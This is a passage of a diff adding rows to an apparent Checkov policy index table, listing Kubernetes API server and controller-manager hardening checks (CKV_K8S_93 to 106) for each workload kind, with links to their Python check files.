+| 3365 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3366 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3367 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3368 | CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3369 | CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3370 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3371 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3372 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3373 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
+| 3374 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3375 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3376 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3377 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3378 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3379 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3380 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3381 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3382 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3383 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) |
+| 3384 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3385 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3386 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3387 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3388 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3389 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3390 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3391 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3392 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3393 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) |
+| 3394 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3395 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3396 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3397 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3398 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3399 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3400 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3401 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3402 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3403 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) |
+| 3404 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3405 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3406 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3407 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3408 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3409 | CKV_K8S_97 | resource | Pod | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3410 | CKV_K8S_97 | resource | PodTemplate | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3411 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3412 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3413 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) |
+| 3414 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3415 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3416 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3417 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3418 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3419 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3420 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3421 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3422 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3423 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) |
+| 3424 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) |
+| 3425 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) |
+| 3426 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) |
+| 3427 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3428 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3429 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3430 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3431 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3432 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3433 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3434 | CKV_K8S_102 | resource | CronJob | 
Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3435 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3436 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3437 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3438 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3439 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3440 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3441 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | 
[ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3442 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3443 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3444 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3445 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3446 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3447 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3448 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | 
[ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3449 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3450 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3451 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3452 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3453 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3454 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3455 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic 
Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3456 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3457 | CKV_K8S_105 | resource | DeploymentConfig | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3458 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3459 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3460 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3461 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | 
[ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3462 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3463 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3464 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3465 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3466 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3467 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | 
